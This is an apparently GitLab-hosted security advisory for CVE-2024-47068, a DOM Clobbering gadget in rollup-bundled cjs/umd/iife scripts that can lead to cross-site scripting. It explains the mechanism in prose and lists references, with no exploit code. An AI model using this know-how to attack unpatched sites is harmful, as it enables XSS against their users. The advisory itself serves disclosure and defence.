CVE-2024-47068: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
(updated )
We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
It’s worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.
References
- github.com/advisories/GHSA-gcx4-mw62-g8wm
- github.com/rollup/rollup
- github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts
- github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts
- github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
- github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
- github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
- nvd.nist.gov/vuln/detail/CVE-2024-47068
Code Behaviors & Features
Detect and mitigate CVE-2024-47068 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →